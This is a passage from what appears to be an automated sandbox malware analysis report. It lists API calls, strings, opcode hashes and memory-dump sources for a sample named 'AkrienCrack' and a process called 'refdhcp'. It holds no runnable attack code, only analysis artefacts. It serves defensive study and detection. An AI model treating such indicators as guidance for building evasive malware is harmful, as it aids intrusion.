              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: 4d16fcb14e182a4734dbcba51e388ddf824b34e7a4464b4b0cf70152fd4beff1
              • Instruction ID: 439a1c9efa6b713ca9328b414945de55bea1cc771cfae36cd118773ee769d0bb
              • Opcode Fuzzy Hash: 4d16fcb14e182a4734dbcba51e388ddf824b34e7a4464b4b0cf70152fd4beff1
              • Instruction Fuzzy Hash: 46E0EC32985622A7D3301BA8AC0EB8B3B64AB0A713F094055FA059B2E0DF704409CB90
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00B62016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00B6201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00B62020
                • Part of subcall function 00B6310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00B6311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00B62035
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction ID: 57591dee603c8343eb1948c193b651dcb55ebccb69d5e1a4c69b87a2d9aa6e43
              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction Fuzzy Hash: C5C04835009E41D43C623BB262032BD0BC0AC63FC4B9270C2E8803B283DE0E4B0AA03A
              APIs
                • Part of subcall function 00B59DF1: GetDC.USER32(00000000), ref: 00B59DF5
                • Part of subcall function 00B59DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B59E00
                • Part of subcall function 00B59DF1: ReleaseDC.USER32(00000000,00000000), ref: 00B59E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00B59F8D
                • Part of subcall function 00B5A1E5: GetDC.USER32(00000000), ref: 00B5A1EE
                • Part of subcall function 00B5A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00B5A21D
                • Part of subcall function 00B5A1E5: ReleaseDC.USER32(00000000,?), ref: 00B5A2B5
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: dc3cc53be000850c78438ffa5de133aa2c0be03eb78ca3f5f2d9e6b21edb0db7
              • Instruction ID: 7bf4e7f4e6c16af8bbb64cf6b881cc28f72f31a2bdb1e2fc6b0aabc3e7d3f08f
              • Opcode Fuzzy Hash: dc3cc53be000850c78438ffa5de133aa2c0be03eb78ca3f5f2d9e6b21edb0db7
              • Instruction Fuzzy Hash: 9F812471208714EFC714DF68D844A2ABBE9FF89701F00899DF98AE7260CB31AD45DB52
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: 3e542f2c27a5428b3a9d45ec7bda752c4f58766455fcb3e5a485c86adf751c5b
              • Instruction ID: 3f522e08621a1ba2bce95facb922ecd0887fdbcfc359d4a24957296271d2a52d
              • Opcode Fuzzy Hash: 3e542f2c27a5428b3a9d45ec7bda752c4f58766455fcb3e5a485c86adf751c5b
              • Instruction Fuzzy Hash: 7451083199C740F9EA303AA4CC97F3676D5E708B03F344DD6BF9A644E1C692555C7A02
              APIs
              • __EH_prolog.LIBCMT ref: 00B47730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B478CC
                • Part of subcall function 00B4A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A458
                • Part of subcall function 00B4A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A489
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: a59154f283264508096588832d7d2aee6ba966996474e101f109f30002a1c03f
              • Instruction ID: 3a69a671aba02400e68c02247090cf28189947ff67a73b2c6c1df2e096788950
              • Opcode Fuzzy Hash: a59154f283264508096588832d7d2aee6ba966996474e101f109f30002a1c03f
              • Instruction Fuzzy Hash: 00415171844168AADB25EB50DD55EEEB3FCEF45300F0040D9B609A3192DB745F88EB61
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: d6eb20c95997cc22184c025bb73e3aca0a87b8a64f50c75f9b65070f8b3e00bf
              • Instruction ID: 4f8cd6b25abf92d00f6c3286d96c86e3595d0df96b9cee69c73314e68efdefc3
              • Opcode Fuzzy Hash: d6eb20c95997cc22184c025bb73e3aca0a87b8a64f50c75f9b65070f8b3e00bf
              • Instruction Fuzzy Hash: 9D41A23544021ABACF20AF61DC81EEB77E9EF45790B1040E5FA58A7252E770DF40FA61
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 4713f6f6f4271bb507f0c1264d739fe3d94e0db2a0e291f8ed3c00a83dfc8d67
              • Instruction ID: ab0a3fbc361e7f605919874151bed77dbca04d173a092f34261d3d22e55505fd
              • Opcode Fuzzy Hash: 4713f6f6f4271bb507f0c1264d739fe3d94e0db2a0e291f8ed3c00a83dfc8d67
              • Instruction Fuzzy Hash: 2D215E71604304DFDB189F64C895A2A77E9EF48712B1885D9EC0A9B292DF70EC04CB61
              APIs
                • Part of subcall function 00B4EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B4EB92
                • Part of subcall function 00B4EB73: GetProcAddress.KERNEL32(00B881C0,CryptUnprotectMemory), ref: 00B4EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,00B4EBEC), ref: 00B4EC84
              Strings
              • CryptUnprotectMemory failed, xrefs: 00B4EC7C
              • CryptProtectMemory failed, xrefs: 00B4EC3B
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 3ca7b694e156e55823497d4c765286f5e906a559ba7ac3144841dbf42931014f
              • Instruction ID: b5ab550aea59e893d3a2d74fa2b9fa6ea250518df0f156cc382e6c9793bd80d5
              • Opcode Fuzzy Hash: 3ca7b694e156e55823497d4c765286f5e906a559ba7ac3144841dbf42931014f
              • Instruction Fuzzy Hash: D5112432A00224ABDB146B25DC86B6E37D4FF04B10B048095F8266B292CE35DF41A7D1
              APIs
              • CreateThread.KERNEL32(00000000,00010000,00B509D0,?,00000000,00000000), ref: 00B508AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00B508F4
                • Part of subcall function 00B46E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B46EAF
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: da4a294694f503796330db5249446d5377ba6f7e0097b3625463a2b2e629f05f
              • Instruction ID: 1f94cc023ee3f9d31a37a398b768058a39cc847f6dd5b774865ca4158218dcaf
              • Opcode Fuzzy Hash: da4a294694f503796330db5249446d5377ba6f7e0097b3625463a2b2e629f05f
              • Instruction Fuzzy Hash: B601D6B2254305AFE6207F64EC81FA673D8EF44752F1004EEFA86A3191CEA1A8499764
              APIs
                • Part of subcall function 00B4DA98: _swprintf.LIBCMT ref: 00B4DABE
                • Part of subcall function 00B4DA98: _strlen.LIBCMT ref: 00B4DADF
                • Part of subcall function 00B4DA98: SetDlgItemTextW.USER32(?,00B7E154,?), ref: 00B4DB3F
                • Part of subcall function 00B4DA98: GetWindowRect.USER32(?,?), ref: 00B4DB79
                • Part of subcall function 00B4DA98: GetClientRect.USER32(?,?), ref: 00B4DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
              • SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: b7f436879cef222de769550a07d68ce2c27190dbeb32a01efce25ec9df1e9dfe
              • Instruction ID: ffb00eace185e76c0f83701ea1cc5a249cb6582973001103915dff83a9a6e4f5
              • Opcode Fuzzy Hash: b7f436879cef222de769550a07d68ce2c27190dbeb32a01efce25ec9df1e9dfe
              • Instruction Fuzzy Hash: EAF0813490024CB6DF251F68C8097AA3BE8FF21345F088894BD99559A1CB74C6D5FB24
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00B50A78,?), ref: 00B50854
              • GetLastError.KERNEL32(?), ref: 00B50860
                • Part of subcall function 00B46E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B46EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B50869
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: 1aa646b67333620d0cc55194180166875076b58b5041ce6ebae03c8b046a18dd
              • Instruction ID: 5c43cd51bbd6376c9bf05a8e6bf027cc3ff62453e9f91eef4fa8da43d7ce6231
              • Opcode Fuzzy Hash: 1aa646b67333620d0cc55194180166875076b58b5041ce6ebae03c8b046a18dd
              • Instruction Fuzzy Hash: 82D02E3294803066CA003324AC0AFAF7AC49F02B31F2047D4F23C661F1DF210A95A2D2
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00B4D32F,?), ref: 00B4DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B4D32F,?), ref: 00B4DA61
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: bafc222d0c39dca64b1e596f2c8152ec4d42023b1de7e2fa324a23e2b867a6de
              • Instruction ID: 75a03a0d4623ae71fa2fb9dd34246fe52b04ec9deeabf41ab6c5249f62881890
              • Opcode Fuzzy Hash: bafc222d0c39dca64b1e596f2c8152ec4d42023b1de7e2fa324a23e2b867a6de
              • Instruction Fuzzy Hash: 97C0123128535076D73017246C0DB8369C86B10F11F05048DF249EB1D0D9E5CA809650
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdcd618f55d12445fc00c11b881dc0e477f6e39ce55b7022ae0b95ba7c2ad141
              • Instruction ID: 3fef15386cf9d734c1d999b742edfe6a59e14bf1c9bb6284bb96e826a297b9c5
              • Opcode Fuzzy Hash: bdcd618f55d12445fc00c11b881dc0e477f6e39ce55b7022ae0b95ba7c2ad141
              • Instruction Fuzzy Hash: CCA1A271B1D94E4FEB98EB68C4657A97BE1EF59310F4001BAD00EC72DACBB92845C740
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: c49d4afa5bdb51f05e7650c40ac406fb1a66320b218b34382f75a63e572c6978
              • Instruction ID: 3ec24cac319f9bf7b08293b7e17654d05ee830109f6fb79c84b6c060e78ea9d4
              • Opcode Fuzzy Hash: c49d4afa5bdb51f05e7650c40ac406fb1a66320b218b34382f75a63e572c6978
              • Instruction Fuzzy Hash: 12D0E9B0E1855D8EDB75EF18C8547ACB6F1BB14344F0101F5951DE2251DBB45AD08F04
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54f4023dfaa3bf9688846a43a476a44fad9226ed798048cbcbdfb0857decd165
              • Instruction ID: e5e9cf4eb0b3cbaa09ecf1344ba6ae70ddf6affaae17d7da1867f93bba9440be
              • Opcode Fuzzy Hash: 54f4023dfaa3bf9688846a43a476a44fad9226ed798048cbcbdfb0857decd165
              • Instruction Fuzzy Hash: 76815B53B0F6C61AF7217BAC68A55E92F91EF8237070901F7E4998B0F7DC156D4A8290
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf26fe28e93e661d74da96cdba27776ac1f3a3524cea6606df535d1ccc8c5aff
              • Instruction ID: d2122c9f87d833491f2d36c8e56d7638204e5ce5f87043ec77e6cb562ef21979
              • Opcode Fuzzy Hash: cf26fe28e93e661d74da96cdba27776ac1f3a3524cea6606df535d1ccc8c5aff
              • Instruction Fuzzy Hash: 17813A43B0F6C21AF7213BAC78B55E92F91EF8267470A01F7E4D98A0F7DC165D4A8294
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 568c4fd6062337fbc080c171a08fec1db2058ec2e7a6f13ece3cb2b9b5f919c8
              • Instruction ID: 4057d0372b6a9da8f088fcca8a46ac40f40d0ffc60a425794cc3985741fa19cc
              • Opcode Fuzzy Hash: 568c4fd6062337fbc080c171a08fec1db2058ec2e7a6f13ece3cb2b9b5f919c8
              • Instruction Fuzzy Hash: E8715C43B0F6C21AF7213BAC38A55E92F91EF8267470901F7E4D98A0F7EC165D4A8294
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ad85fb4500817a5804af2ca2eb4ffdb7256722fa01fb6e491d79c27f3ec1271
              • Instruction ID: ba30450fc2c192324a1a58321cee2631167baf121bb06c641dc18664a2536900
              • Opcode Fuzzy Hash: 1ad85fb4500817a5804af2ca2eb4ffdb7256722fa01fb6e491d79c27f3ec1271
              • Instruction Fuzzy Hash: 6F81DF31B2DA5D4FDB58DE5888615A97BE3FFD8314B15017EE49EC32A2DE31AD028780
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dca9006458a86064c8bd1361ad0e85c66fcf207b6d556d4301b4b87fcd1733ec
              • Instruction ID: c66aaf78e00b696ec59e659bd24be5c6a4f4801cb2e849d93155e73d34013651
              • Opcode Fuzzy Hash: dca9006458a86064c8bd1361ad0e85c66fcf207b6d556d4301b4b87fcd1733ec
              • Instruction Fuzzy Hash: 1351D131B18B9A4FDB58DE5888605AA7BE2FFD8314B15417ED45EC7296DE30EC028781
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 054ac09c74aea7896fc3a8481eceef74687c020ca8a652f6cc67535bcab9c48a
              • Instruction ID: c6ecd521a1b803e4d761dea9ed974c0e9fb58ed1d1dfb7b51c1ed5842547874c
              • Opcode Fuzzy Hash: 054ac09c74aea7896fc3a8481eceef74687c020ca8a652f6cc67535bcab9c48a
              • Instruction Fuzzy Hash: AF514B70E1961D9FEB64EB94C4A46ED7BF1EF58310F910179D009E72A2DF78AA44CB10
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3dd2d9dfff79d5c33df775f9432a04acabe9613dc996a1d9980c2abb8d612f40
              • Instruction ID: 75e04b57364f9ac526fea7502001740ef9e56c727abaa21110bb263e59721460
              • Opcode Fuzzy Hash: 3dd2d9dfff79d5c33df775f9432a04acabe9613dc996a1d9980c2abb8d612f40
              • Instruction Fuzzy Hash: 14216B52B0E68767E7113BBC98792E93F94FF41328F0A00B7D499CA093EE156959C2C1
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17241cb8483017d68a8bc506e78ea93d8f153d14732d1aad7abd9593c3b1178c
              • Instruction ID: 46a557ac36dc87c85a24cca6211a472e9d763cf428404e1ffa335c278aa2846a
              • Opcode Fuzzy Hash: 17241cb8483017d68a8bc506e78ea93d8f153d14732d1aad7abd9593c3b1178c
              • Instruction Fuzzy Hash: DD218E3090E78A5FD753ABB488685AA7FF0EF06314B0A05EBD495CB0B3DA289945C711
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53d1960b97063b0ca2070fc616b0f0af1edb45d92cea3e3ee455b78e761c4e2e
              • Instruction ID: 8e0b2d243d38d07b408b60b6a2419249f35b2b02ce4bfe503311794b37849a90
              • Opcode Fuzzy Hash: 53d1960b97063b0ca2070fc616b0f0af1edb45d92cea3e3ee455b78e761c4e2e
